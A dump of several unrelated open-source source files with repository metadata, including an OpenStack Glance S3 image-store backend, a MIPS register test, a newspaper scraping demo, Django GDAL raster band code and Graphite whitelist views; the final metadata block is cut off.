class StoreLocation(glance.store.location.StoreLocation):
    """
    Class describing an S3 URI. An S3 URI can look like any of
    the following:
        s3://accesskey:secretkey@s3.amazonaws.com/bucket/key-id
        s3+http://accesskey:secretkey@s3.amazonaws.com/bucket/key-id
        s3+https://accesskey:secretkey@s3.amazonaws.com/bucket/key-id
    The s3+https:// URIs indicate there is an HTTPS s3service URL
    """

    def process_specs(self):
        """Populate scheme/credentials/bucket/key from the specs dict."""
        self.scheme = self.specs.get('scheme', 's3')
        self.accesskey = self.specs.get('accesskey')
        self.secretkey = self.specs.get('secretkey')
        s3_host = self.specs.get('s3serviceurl')
        self.bucket = self.specs.get('bucket')
        self.key = self.specs.get('key')
        # Fold the service URL's transport into the scheme and keep only
        # the bare host/path part in s3serviceurl.
        if s3_host.startswith('https://'):
            self.scheme = 's3+https'
            s3_host = s3_host[8:].strip('/')
        elif s3_host.startswith('http://'):
            s3_host = s3_host[7:].strip('/')
        self.s3serviceurl = s3_host.strip('/')

    def _get_credstring(self):
        """Return 'accesskey:secretkey@' when credentials are set, else ''."""
        if self.accesskey:
            return '%s:%s@' % (self.accesskey, self.secretkey)
        return ''

    def get_uri(self):
        """Reassemble the canonical S3 URI from the parsed fields."""
        return "%s://%s%s/%s/%s" % (
            self.scheme,
            self._get_credstring(),
            self.s3serviceurl,
            self.bucket,
            self.key)

    def parse_uri(self, uri):
        """
        Parse URLs. This method fixes an issue where credentials specified
        in the URL are interpreted differently in Python 2.6.1+ than prior
        versions of Python.
        Note that an Amazon AWS secret key can contain the forward slash,
        which is entirely retarded, and breaks urlparse miserably.
        This function works around that issue.
        """
        # Make sure that URIs that contain multiple schemes, such as:
        # s3://accesskey:secretkey@https://s3.amazonaws.com/bucket/key-id
        # are immediately rejected.
        if uri.count('://') != 1:
            reason = _("URI cannot contain more than one occurrence "
                       "of a scheme. If you have specified a URI like "
                       "s3://accesskey:secretkey@"
                       "https://s3.amazonaws.com/bucket/key-id"
                       ", you need to change it to use the "
                       "s3+https:// scheme, like so: "
                       "s3+https://accesskey:secretkey@"
                       "s3.amazonaws.com/bucket/key-id")
            LOG.debug(_("Invalid store uri: %s") % reason)
            raise exception.BadStoreUri(message=reason)
        pieces = urlparse.urlparse(uri)
        # NOTE(review): assert is stripped under ``python -O``; scheme
        # validation would then silently pass — consider raising instead.
        assert pieces.scheme in ('s3', 's3+http', 's3+https')
        self.scheme = pieces.scheme
        path = pieces.path.strip('/')
        netloc = pieces.netloc.strip('/')
        entire_path = (netloc + '/' + path).strip('/')
        # NOTE(review): the '@' test is done on the raw URI but the split
        # happens on entire_path; an '@' in the bucket/key portion would
        # also take this branch — confirm against callers.
        if '@' in uri:
            creds, path = entire_path.split('@')
            cred_parts = creds.split(':')
            try:
                access_key = cred_parts[0]
                secret_key = cred_parts[1]
                # NOTE(jaypipes): Need to encode to UTF-8 here because of a
                # bug in the HMAC library that boto uses.
                # See: http://bugs.python.org/issue5285
                # See: http://trac.edgewall.org/ticket/8083
                access_key = access_key.encode('utf-8')
                secret_key = secret_key.encode('utf-8')
                self.accesskey = access_key
                self.secretkey = secret_key
            except IndexError:
                reason = _("Badly formed S3 credentials %s") % creds
                LOG.debug(reason)
                raise exception.BadStoreUri()
        else:
            self.accesskey = None
            path = entire_path
        try:
            path_parts = path.split('/')
            self.key = path_parts.pop()
            self.bucket = path_parts.pop()
            if path_parts:
                self.s3serviceurl = '/'.join(path_parts).strip('/')
            else:
                # NOTE(review): 'reason' is assigned but neither logged nor
                # passed to the exception here, unlike the other branches.
                reason = _("Badly formed S3 URI. Missing s3 service URL.")
                raise exception.BadStoreUri()
        except IndexError:
            reason = _("Badly formed S3 URI: %s") % uri
            LOG.debug(reason)
            raise exception.BadStoreUri()
class ChunkedFile(object):
    """
    We send this back to the Glance API server as
    something that can iterate over a ``boto.s3.key.Key``
    """

    CHUNKSIZE = 65536

    def __init__(self, fp):
        self.fp = fp

    def __iter__(self):
        """Return an iterator over the image file"""
        try:
            # A falsy fp (e.g. already closed) yields nothing.
            while self.fp:
                chunk = self.fp.read(ChunkedFile.CHUNKSIZE)
                if not chunk:
                    break
                yield chunk
        finally:
            self.close()

    def getvalue(self):
        """Return entire string value... used in testing."""
        self.len = 0
        pieces = []
        for chunk in self:
            pieces.append(chunk)
            self.len += len(chunk)
        return "".join(pieces)

    def close(self):
        """Close the internal file pointer."""
        if self.fp:
            self.fp.close()
            self.fp = None
class Store(glance.store.base.Store):
    """An implementation of the s3 adapter."""

    EXAMPLE_URL = "s3://<ACCESS_KEY>:<SECRET_KEY>@<S3_URL>/<BUCKET>/<OBJ>"

    def get_schemes(self):
        """Return the URI schemes handled by this store."""
        return ('s3', 's3+http', 's3+https')

    def configure_add(self):
        """
        Configure the Store to use the stored configuration options
        Any store that needs special configuration should implement
        this method. If the store was not able to successfully configure
        itself, it should raise `exception.BadStoreConfiguration`
        """
        self.s3_host = self._option_get('s3_store_host')
        access_key = self._option_get('s3_store_access_key')
        secret_key = self._option_get('s3_store_secret_key')
        # NOTE(jaypipes): Need to encode to UTF-8 here because of a
        # bug in the HMAC library that boto uses.
        # See: http://bugs.python.org/issue5285
        # See: http://trac.edgewall.org/ticket/8083
        self.access_key = access_key.encode('utf-8')
        self.secret_key = secret_key.encode('utf-8')
        self.bucket = self._option_get('s3_store_bucket')
        # Derive the scheme from the configured host; a host with no
        # explicit transport defaults to plain HTTP.
        self.scheme = 's3'
        if self.s3_host.startswith('https://'):
            self.scheme = 's3+https'
            self.full_s3_host = self.s3_host
        elif self.s3_host.startswith('http://'):
            self.full_s3_host = self.s3_host
        else:  # Defaults http
            self.full_s3_host = 'http://' + self.s3_host
        self.s3_store_object_buffer_dir = CONF.s3_store_object_buffer_dir

    def _option_get(self, param):
        """Fetch a required config option; raise if missing/empty."""
        result = getattr(CONF, param)
        if not result:
            reason = (_("Could not find %(param)s in configuration "
                        "options.") % {'param': param})
            LOG.debug(reason)
            raise exception.BadStoreConfiguration(store_name="s3",
                                                  reason=reason)
        return result

    def get(self, location):
        """
        Takes a `glance.store.location.Location` object that indicates
        where to find the image file, and returns a tuple of generator
        (for reading the image file) and image_size
        :param location `glance.store.location.Location` object, supplied
                        from glance.store.location.get_location_from_uri()
        :raises `glance.exception.NotFound` if image does not exist
        """
        key = self._retrieve_key(location)
        key.BufferSize = self.CHUNKSIZE

        # Adapter making the boto key readable in CHUNKSIZE pieces.
        class ChunkedIndexable(glance.store.Indexable):
            def another(self):
                return (self.wrapped.fp.read(ChunkedFile.CHUNKSIZE)
                        if self.wrapped.fp else None)
        return (ChunkedIndexable(ChunkedFile(key), key.size), key.size)

    def get_size(self, location):
        """
        Takes a `glance.store.location.Location` object that indicates
        where to find the image file, and returns the image_size (or 0
        if unavailable)
        :param location `glance.store.location.Location` object, supplied
                        from glance.store.location.get_location_from_uri()
        """
        try:
            key = self._retrieve_key(location)
            return key.size
        except Exception:
            # Best-effort: any failure to reach S3 is reported as size 0.
            return 0

    def _retrieve_key(self, location):
        """Open an S3 connection for ``location`` and return its boto key."""
        loc = location.store_location
        from boto.s3.connection import S3Connection
        s3_conn = S3Connection(loc.accesskey, loc.secretkey,
                               host=loc.s3serviceurl,
                               is_secure=(loc.scheme == 's3+https'),
                               calling_format=get_calling_format())
        bucket_obj = get_bucket(s3_conn, loc.bucket)
        key = get_key(bucket_obj, loc.key)
        msg = _("Retrieved image object from S3 using (s3_host=%(s3_host)s, "
                "access_key=%(accesskey)s, bucket=%(bucket)s, "
                "key=%(obj_name)s)") % ({'s3_host': loc.s3serviceurl,
                                         'accesskey': loc.accesskey,
                                         'bucket': loc.bucket,
                                         'obj_name': loc.key})
        LOG.debug(msg)
        return key

    def add(self, image_id, image_file, image_size):
        """
        Stores an image file with supplied identifier to the backend
        storage system and returns a tuple containing information
        about the stored image.
        :param image_id: The opaque image identifier
        :param image_file: The image data to write, as a file-like object
        :param image_size: The size of the image data to write, in bytes
        :retval tuple of URL in backing store, bytes written, checksum
                and a dictionary with storage system specific information
        :raises `glance.common.exception.Duplicate` if the image already
                existed
        S3 writes the image data using the scheme:
            s3://<ACCESS_KEY>:<SECRET_KEY>@<S3_URL>/<BUCKET>/<OBJ>
        where:
            <USER> = ``s3_store_user``
            <KEY> = ``s3_store_key``
            <S3_HOST> = ``s3_store_host``
            <BUCKET> = ``s3_store_bucket``
            <ID> = The id of the image being added
        """
        from boto.s3.connection import S3Connection
        loc = StoreLocation({'scheme': self.scheme,
                             'bucket': self.bucket,
                             'key': image_id,
                             's3serviceurl': self.full_s3_host,
                             'accesskey': self.access_key,
                             'secretkey': self.secret_key})
        s3_conn = S3Connection(loc.accesskey, loc.secretkey,
                               host=loc.s3serviceurl,
                               is_secure=(loc.scheme == 's3+https'),
                               calling_format=get_calling_format())
        create_bucket_if_missing(self.bucket, s3_conn)
        bucket_obj = get_bucket(s3_conn, self.bucket)
        obj_name = str(image_id)

        # Mask real credentials in any URI that ends up in logs/errors.
        def _sanitize(uri):
            return re.sub('//.*:.*@',
                          '//s3_store_secret_key:s3_store_access_key@',
                          uri)
        key = bucket_obj.get_key(obj_name)
        if key and key.exists():
            raise exception.Duplicate(_("S3 already has an image at "
                                        "location %s") %
                                      _sanitize(loc.get_uri()))
        msg = _("Adding image object to S3 using (s3_host=%(s3_host)s, "
                "access_key=%(access_key)s, bucket=%(bucket)s, "
                "key=%(obj_name)s)") % ({'s3_host': self.s3_host,
                                         'access_key': self.access_key,
                                         'bucket': self.bucket,
                                         'obj_name': obj_name})
        LOG.debug(msg)
        key = bucket_obj.new_key(obj_name)
        # We need to wrap image_file, which is a reference to the
        # webob.Request.body_file, with a seekable file-like object,
        # otherwise the call to set_contents_from_file() will die
        # with an error about Input object has no method 'seek'. We
        # might want to call webob.Request.make_body_seekable(), but
        # unfortunately, that method copies the entire image into
        # memory and results in LP Bug #818292 occurring. So, here
        # we write temporary file in as memory-efficient manner as
        # possible and then supply the temporary file to S3. We also
        # take this opportunity to calculate the image checksum while
        # writing the tempfile, so we don't need to call key.compute_md5()
        msg = _("Writing request body file to temporary file "
                "for %s") % _sanitize(loc.get_uri())
        LOG.debug(msg)
        tmpdir = self.s3_store_object_buffer_dir
        temp_file = tempfile.NamedTemporaryFile(dir=tmpdir)
        checksum = hashlib.md5()
        for chunk in utils.chunkreadable(image_file, self.CHUNKSIZE):
            checksum.update(chunk)
            temp_file.write(chunk)
        temp_file.flush()
        msg = (_("Uploading temporary file to S3 for %s") %
               _sanitize(loc.get_uri()))
        LOG.debug(msg)
        # OK, now upload the data into the key
        # NOTE(review): reopens the temp file by name while the
        # NamedTemporaryFile is still open — fine on POSIX, not on
        # Windows; confirm target platforms.
        key.set_contents_from_file(open(temp_file.name, 'r+b'), replace=False)
        size = key.size
        checksum_hex = checksum.hexdigest()
        LOG.debug(_("Wrote %(size)d bytes to S3 key named %(obj_name)s "
                    "with checksum %(checksum_hex)s"),
                  {'size': size, 'obj_name': obj_name,
                   'checksum_hex': checksum_hex})
        return (loc.get_uri(), size, checksum_hex, {})

    def delete(self, location):
        """
        Takes a `glance.store.location.Location` object that indicates
        where to find the image file to delete
        :location `glance.store.location.Location` object, supplied
                  from glance.store.location.get_location_from_uri()
        :raises NotFound if image does not exist
        """
        loc = location.store_location
        from boto.s3.connection import S3Connection
        s3_conn = S3Connection(loc.accesskey, loc.secretkey,
                               host=loc.s3serviceurl,
                               is_secure=(loc.scheme == 's3+https'),
                               calling_format=get_calling_format())
        bucket_obj = get_bucket(s3_conn, loc.bucket)
        # Close the key when we're through.
        key = get_key(bucket_obj, loc.key)
        msg = _("Deleting image object from S3 using (s3_host=%(s3_host)s, "
                "access_key=%(accesskey)s, bucket=%(bucket)s, "
                "key=%(obj_name)s)") % ({'s3_host': loc.s3serviceurl,
                                         'accesskey': loc.accesskey,
                                         'bucket': loc.bucket,
                                         'obj_name': loc.key})
        LOG.debug(msg)
        return key.delete()
def get_bucket(conn, bucket_id):
    """
    Get a bucket from an s3 connection

    :param conn: The ``boto.s3.connection.S3Connection``
    :param bucket_id: ID of the bucket to fetch

    :raises ``glance.exception.NotFound`` if bucket is not found.
    """
    bucket = conn.get_bucket(bucket_id)
    if bucket:
        return bucket
    # Guard clause: a falsy result means the bucket does not exist.
    msg = _("Could not find bucket with ID %s") % bucket_id
    LOG.debug(msg)
    raise exception.NotFound(msg)
def get_s3_location(s3_host):
    """Map a known AWS endpoint hostname to its boto ``Location`` constant.

    Unrecognised hosts fall back to ``Location.DEFAULT``.
    """
    from boto.s3.connection import Location
    # strip off scheme and port if present
    host = re.sub('^(https?://)?(?P<host>[^:]+)(:[0-9]+)?$',
                  '\g<host>',
                  s3_host)
    region_map = {
        's3.amazonaws.com': Location.DEFAULT,
        's3-eu-west-1.amazonaws.com': Location.EU,
        's3-us-west-1.amazonaws.com': Location.USWest,
        's3-ap-southeast-1.amazonaws.com': Location.APSoutheast,
        's3-ap-northeast-1.amazonaws.com': Location.APNortheast,
    }
    return region_map.get(host, Location.DEFAULT)
def create_bucket_if_missing(bucket, s3_conn):
    """
    Creates a missing bucket in S3 if the
    ``s3_store_create_bucket_on_put`` option is set.
    :param bucket: Name of bucket to create
    :param s3_conn: Connection to S3
    """
    from boto.exception import S3ResponseError
    try:
        # Probe for existence; boto raises S3ResponseError on a miss.
        s3_conn.get_bucket(bucket)
    except S3ResponseError as e:
        if e.status == httplib.NOT_FOUND:
            if CONF.s3_store_create_bucket_on_put:
                location = get_s3_location(CONF.s3_store_host)
                try:
                    s3_conn.create_bucket(bucket, location=location)
                except S3ResponseError as e:
                    msg = (_("Failed to add bucket to S3.\n"
                             "Got error from S3: %(e)s") % {'e': e})
                    raise glance.store.BackendException(msg)
            else:
                msg = (_("The bucket %(bucket)s does not exist in "
                         "S3. Please set the "
                         "s3_store_create_bucket_on_put option "
                         "to add bucket to S3 automatically.")
                       % {'bucket': bucket})
                raise glance.store.BackendException(msg)
        # NOTE(review): non-404 S3ResponseErrors are silently swallowed
        # here — confirm this is intentional best-effort behavior.
def get_key(bucket, obj):
    """
    Get a key from a bucket

    :param bucket: The ``boto.s3.Bucket``
    :param obj: Object to get the key for

    :raises ``glance.exception.NotFound`` if key is not found.
    """
    key = bucket.get_key(obj)
    if key and key.exists():
        return key
    # Guard clause: missing or nonexistent key is a NotFound.
    msg = (_("Could not find key %(obj)s in bucket %(bucket)s") %
           {'obj': obj, 'bucket': bucket})
    LOG.debug(msg)
    raise exception.NotFound(msg)
def get_calling_format(bucket_format=None):
    """Return the boto calling format for the configured URL style.

    'path' selects OrdinaryCallingFormat; anything else (including the
    default 'subdomain') selects SubdomainCallingFormat.
    """
    import boto.s3.connection
    fmt = bucket_format
    if fmt is None:
        fmt = CONF.s3_store_bucket_url_format
    if fmt.lower() == 'path':
        return boto.s3.connection.OrdinaryCallingFormat()
    return boto.s3.connection.SubdomainCallingFormat()
| {
"content_hash": "283087289edee551b890122855df7556",
"timestamp": "",
"source": "github",
"line_count": 527,
"max_line_length": 78,
"avg_line_length": 38.04933586337761,
"alnum_prop": 0.5532615200478755,
"repo_name": "cloudbau/glance",
"id": "d9638212f01a119388f1bbac6715ec7d69585692",
"size": "20733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "glance/store/s3.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2489476"
},
{
"name": "Shell",
"bytes": "3488"
}
],
"symlink_target": ""
} |
from beritest_tools import BaseBERITestCase
class test_raw_sw(BaseBERITestCase):
    """Check register values (a0-a6) left by the store-word (sw) assembly
    test; each register holds the result of one load/store scenario."""

    def test_a0(self):
        '''Test unsigned load of stored word from double word'''
        self.assertRegisterEqual(self.MIPS.a0, 0xfedcba98, "Unsigned load of word from double word failed")

    def test_a1(self):
        '''Test signed load of stored positive word'''
        self.assertRegisterEqual(self.MIPS.a1, 1, "Sign-extended load of positive word failed")

    def test_a2(self):
        '''Test signed load of stored negative word'''
        self.assertRegisterEqual(self.MIPS.a2, 0xffffffffffffffff, "Sign-extended load of negative word failed")

    def test_a3(self):
        '''Test unsigned load of stored positive word'''
        self.assertRegisterEqual(self.MIPS.a3, 1, "Unsigned load of positive word failed")

    def test_a4(self):
        '''Test unsigned load of stored negative word'''
        self.assertRegisterEqual(self.MIPS.a4, 0xffffffff, "Unsigned load of negative word failed")

    def test_pos_offset(self):
        '''Test word store, load at positive offset'''
        self.assertRegisterEqual(self.MIPS.a5, 2, "Word store, load at positive offset failed")

    def test_neg_offset(self):
        '''Test word store, load at negative offset'''
        self.assertRegisterEqual(self.MIPS.a6, 1, "Word store, load at negative offset failed")
| {
"content_hash": "57d9a14f79dcb032e4b94e4423233874",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 112,
"avg_line_length": 45.46666666666667,
"alnum_prop": 0.6884164222873901,
"repo_name": "8l/beri",
"id": "676e66e282115718fce883a5f6cc8a11ab85a01e",
"size": "2502",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cheritest/trunk/tests/mem/test_raw_sw.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "1629022"
},
{
"name": "Bluespec",
"bytes": "2336405"
},
{
"name": "C",
"bytes": "1058899"
},
{
"name": "C++",
"bytes": "1864"
},
{
"name": "Groff",
"bytes": "14381"
},
{
"name": "Haskell",
"bytes": "11711"
},
{
"name": "Lex",
"bytes": "2894"
},
{
"name": "Makefile",
"bytes": "242450"
},
{
"name": "Mathematica",
"bytes": "291"
},
{
"name": "Objective-C",
"bytes": "2387"
},
{
"name": "OpenEdge ABL",
"bytes": "568"
},
{
"name": "Perl",
"bytes": "19159"
},
{
"name": "Python",
"bytes": "1491002"
},
{
"name": "Shell",
"bytes": "91130"
},
{
"name": "SystemVerilog",
"bytes": "12058"
},
{
"name": "Tcl",
"bytes": "132818"
},
{
"name": "TeX",
"bytes": "4996"
},
{
"name": "Verilog",
"bytes": "125674"
},
{
"name": "Yacc",
"bytes": "5871"
}
],
"symlink_target": ""
} |
import newspaper
# Demo script: crawl CNN with newspaper and print what it extracts.
# Every call below does live network I/O against cnn.com.
cnn_paper = newspaper.build('http://cnn.com')
# for article in cnn_paper.articles:
#     print(article.url)
# List the category URLs discovered while building the source.
for category in cnn_paper.category_urls():
    print(category)
article = cnn_paper.articles[0]
article.download()  # fetch raw HTML; must precede parse()
print(article.html)
article.parse()  # extract text/authors/media from the downloaded HTML
print(article.authors)
print(article.text)
print(article.top_image)
print(article.movies)
# NOTE(review): nlp() appears to populate keywords/summary as a side
# effect; confirm whether its return value is meaningful before printing.
print(article.nlp())
print(article.keywords)
print(article.summary)
| {
"content_hash": "bb0f63be5f0f49c8e76662f9a993f51b",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 45,
"avg_line_length": 20.80952380952381,
"alnum_prop": 0.7551487414187643,
"repo_name": "Akagi201/learning-python",
"id": "97f6e3f677d5ff65e3db3980b765c783398daf1d",
"size": "437",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "newspaper/test_newspaper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "125"
},
{
"name": "CSS",
"bytes": "82315"
},
{
"name": "HTML",
"bytes": "16738"
},
{
"name": "JavaScript",
"bytes": "253132"
},
{
"name": "Jupyter Notebook",
"bytes": "3666"
},
{
"name": "Less",
"bytes": "2022"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "336950"
},
{
"name": "Rich Text Format",
"bytes": "49342"
},
{
"name": "Shell",
"bytes": "4498"
}
],
"symlink_target": ""
} |
import math
from ctypes import byref, c_double, c_int, c_void_p
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.error import GDALException
from django.contrib.gis.gdal.prototypes import raster as capi
from django.contrib.gis.shortcuts import numpy
from django.utils import six
from django.utils.encoding import force_text
from django.utils.six.moves import range
from .const import GDAL_INTEGER_TYPES, GDAL_PIXEL_TYPES, GDAL_TO_CTYPES
class GDALBand(GDALBase):
    """
    Wraps a GDAL raster band, needs to be obtained from a GDALRaster object.
    """
    def __init__(self, source, index):
        # Keep the parent raster alive and grab the band pointer
        # (GDAL band indices are one-based).
        self.source = source
        self._ptr = capi.get_ds_raster_band(source._ptr, index)
    def _flush(self):
        """
        Call the flush method on the Band's parent raster and force a refresh
        of the statistics attribute when requested the next time.
        """
        self.source._flush()
        self._stats_refresh = True
    @property
    def description(self):
        """
        Returns the description string of the band.
        """
        return force_text(capi.get_band_description(self._ptr))
    @property
    def width(self):
        """
        Width (X axis) in pixels of the band.
        """
        return capi.get_band_xsize(self._ptr)
    @property
    def height(self):
        """
        Height (Y axis) in pixels of the band.
        """
        return capi.get_band_ysize(self._ptr)
    @property
    def pixel_count(self):
        """
        Returns the total number of pixels in this band.
        """
        return self.width * self.height
    # Set by _flush() to force statistics() to recompute on next call.
    _stats_refresh = False
    def statistics(self, refresh=False, approximate=False):
        """
        Compute statistics on the pixel values of this band.
        The return value is a tuple with the following structure:
        (minimum, maximum, mean, standard deviation).
        If approximate=True, the statistics may be computed based on overviews
        or a subset of image tiles.
        If refresh=True, the statistics will be computed from the data directly,
        and the cache will be updated where applicable.
        For empty bands (where all pixel values are nodata), all statistics
        values are returned as None.
        For raster formats using Persistent Auxiliary Metadata (PAM) services,
        the statistics might be cached in an auxiliary file.
        """
        # Prepare array with arguments for capi function
        smin, smax, smean, sstd = c_double(), c_double(), c_double(), c_double()
        stats_args = [
            self._ptr, c_int(approximate), byref(smin), byref(smax),
            byref(smean), byref(sstd), c_void_p(), c_void_p(),
        ]
        if refresh or self._stats_refresh:
            capi.compute_band_statistics(*stats_args)
        else:
            # Add additional argument to force computation if there is no
            # existing PAM file to take the values from.
            force = True
            stats_args.insert(2, c_int(force))
            capi.get_band_statistics(*stats_args)
        result = smin.value, smax.value, smean.value, sstd.value
        # Check if band is empty (in that case, set all statistics to None)
        if any((math.isnan(val) for val in result)):
            result = (None, None, None, None)
        self._stats_refresh = False
        return result
    @property
    def min(self):
        """
        Return the minimum pixel value for this band.
        """
        return self.statistics()[0]
    @property
    def max(self):
        """
        Return the maximum pixel value for this band.
        """
        return self.statistics()[1]
    @property
    def mean(self):
        """
        Return the mean of all pixel values of this band.
        """
        return self.statistics()[2]
    @property
    def std(self):
        """
        Return the standard deviation of all pixel values of this band.
        """
        return self.statistics()[3]
    @property
    def nodata_value(self):
        """
        Returns the nodata value for this band, or None if it isn't set.
        """
        # Get value and nodata exists flag
        nodata_exists = c_int()
        value = capi.get_band_nodata_value(self._ptr, nodata_exists)
        if not nodata_exists:
            value = None
        # If the pixeltype is an integer, convert to int
        elif self.datatype() in GDAL_INTEGER_TYPES:
            value = int(value)
        return value
    @nodata_value.setter
    def nodata_value(self, value):
        """
        Sets the nodata value for this band.
        """
        if value is None:
            # Deleting a nodata value needs a GDAL entry point that only
            # exists from GDAL 2.1 on; the prototype is None when absent.
            if not capi.delete_band_nodata_value:
                raise ValueError('GDAL >= 2.1 required to delete nodata values.')
            capi.delete_band_nodata_value(self._ptr)
        elif not isinstance(value, (int, float)):
            raise ValueError('Nodata value must be numeric or None.')
        else:
            capi.set_band_nodata_value(self._ptr, value)
        self._flush()
    def datatype(self, as_string=False):
        """
        Returns the GDAL Pixel Datatype for this band.
        """
        dtype = capi.get_band_datatype(self._ptr)
        if as_string:
            dtype = GDAL_PIXEL_TYPES[dtype]
        return dtype
    def data(self, data=None, offset=None, size=None, shape=None, as_memoryview=False):
        """
        Reads or writes pixel values for this band. Blocks of data can
        be accessed by specifying the width, height and offset of the
        desired block. The same specification can be used to update
        parts of a raster by providing an array of values.
        Allowed input data types are bytes, memoryview, list, tuple, and array.
        """
        if not offset:
            offset = (0, 0)
        if not size:
            size = (self.width - offset[0], self.height - offset[1])
        if not shape:
            shape = size
        if any(x <= 0 for x in size):
            raise ValueError('Offset too big for this raster.')
        if size[0] > self.width or size[1] > self.height:
            raise ValueError('Size is larger than raster.')
        # Create ctypes type array generator
        ctypes_array = GDAL_TO_CTYPES[self.datatype()] * (shape[0] * shape[1])
        if data is None:
            # Set read mode
            access_flag = 0
            # Prepare empty ctypes array
            data_array = ctypes_array()
        else:
            # Set write mode
            access_flag = 1
            # Instantiate ctypes array holding the input data
            if isinstance(data, (bytes, six.memoryview)) or (numpy and isinstance(data, numpy.ndarray)):
                data_array = ctypes_array.from_buffer_copy(data)
            else:
                data_array = ctypes_array(*data)
        # Access band
        capi.band_io(self._ptr, access_flag, offset[0], offset[1],
                     size[0], size[1], byref(data_array), shape[0],
                     shape[1], self.datatype(), 0, 0)
        # Return data as numpy array if possible, otherwise as list
        if data is None:
            if as_memoryview:
                return memoryview(data_array)
            elif numpy:
                # reshape() needs a reshape parameter with the height first.
                return numpy.frombuffer(
                    data_array, dtype=numpy.dtype(data_array)
                ).reshape(tuple(reversed(size)))
            else:
                return list(data_array)
        else:
            self._flush()
class BandList(list):
    """Sequence view over a raster's bands, exposing GDAL's one-based
    band numbering through zero-based Python indexing."""
    def __init__(self, source):
        self.source = source
        super(BandList, self).__init__()
    def __iter__(self):
        band_count = len(self)
        for band_index in range(1, band_count + 1):
            yield GDALBand(self.source, band_index)
    def __len__(self):
        # The band count always comes from GDAL, never from list state.
        return capi.get_ds_raster_count(self.source._ptr)
    def __getitem__(self, index):
        try:
            return GDALBand(self.source, index + 1)
        except GDALException:
            raise GDALException('Unable to get band index %d' % index)
| {
"content_hash": "d29ec4c671ac085a789771db0792c346",
"timestamp": "",
"source": "github",
"line_count": 251,
"max_line_length": 104,
"avg_line_length": 32.286852589641434,
"alnum_prop": 0.5844027640671273,
"repo_name": "jscn/django",
"id": "878cc5aa4a660e4e50432fb552b6e2127edeb6cd",
"size": "8104",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "django/contrib/gis/gdal/raster/band.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "54032"
},
{
"name": "HTML",
"bytes": "173202"
},
{
"name": "JavaScript",
"bytes": "247734"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11227887"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
from django.db import models
class OrderTransaction(models.Model):
    """Minimal model recording the order number of a payment transaction."""
    # Indexed so transactions can be looked up quickly by order number.
    order_number = models.CharField(max_length=128, db_index=True)
| {
"content_hash": "10cfcfd802a1093a6a04c6b283980ac0",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 66,
"avg_line_length": 22.833333333333332,
"alnum_prop": 0.7664233576642335,
"repo_name": "django-oscar/django-oscar-amazon-payments",
"id": "e8a6fa82750bdfdfcd1b2b6356f4152199606ae9",
"size": "137",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oscar_amazon_payments/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "56183"
}
],
"symlink_target": ""
} |
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import os
import pickle
from random import randint
from django.conf import settings
from graphite.compat import HttpResponse
from graphite.util import unpickle
def add(request):
    """Union the whitespace-separated metric names POSTed under
    'metrics' into the persisted whitelist."""
    requested = set(request.POST['metrics'].split())
    save_whitelist(load_whitelist() | requested)
    return HttpResponse(content_type="text/plain", content="OK")
def remove(request):
    """Drop the whitespace-separated metric names POSTed under
    'metrics' from the persisted whitelist."""
    doomed = set(request.POST['metrics'].split())
    save_whitelist(load_whitelist() - doomed)
    return HttpResponse(content_type="text/plain", content="OK")
def show(request):
    """Render the whitelist as plain text, one metric per line, sorted."""
    members = '\n'.join(sorted(load_whitelist()))
    return HttpResponse(content_type="text/plain", content=members)
def load_whitelist():
    """Read and unpickle the whitelist set from settings.WHITELIST_FILE.

    The file is opened in a context manager so the descriptor is
    released immediately; the previous version left the handle open
    until garbage collection.
    """
    with open(settings.WHITELIST_FILE, 'rb') as fh:
        raw = fh.read()
    return unpickle.loads(raw)
def save_whitelist(whitelist):
    """Atomically replace settings.WHITELIST_FILE with the pickled set.

    Serialization happens first so pickling errors are raised before the
    filesystem is touched; the data is written to a uniquely named temp
    file and renamed into place, and the temp file is always removed on
    failure.
    """
    # do this instead of dump() to raise potential exceptions before open()
    serialized = pickle.dumps(whitelist, protocol=-1)
    tmpfile = '%s-%d' % (settings.WHITELIST_FILE, randint(0, 100000))
    try:
        # 'with' guarantees the handle is closed even if write() raises,
        # so the finally-block can unlink the temp file; the original
        # leaked the handle on a failed write.
        with open(tmpfile, 'wb') as fh:
            fh.write(serialized)
        if os.path.exists(settings.WHITELIST_FILE):
            os.unlink(settings.WHITELIST_FILE)
        os.rename(tmpfile, settings.WHITELIST_FILE)
    finally:
        if os.path.exists(tmpfile):
            os.unlink(tmpfile)
| {
"content_hash": "4b3aa8a3c85341b4430c643ef9280668",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 122,
"avg_line_length": 33.21666666666667,
"alnum_prop": 0.7420973406924235,
"repo_name": "johnseekins/graphite-web",
"id": "ecdb04059c10c2d51509c0a521e260862a5fef95",
"size": "1993",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "webapp/graphite/whitelist/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
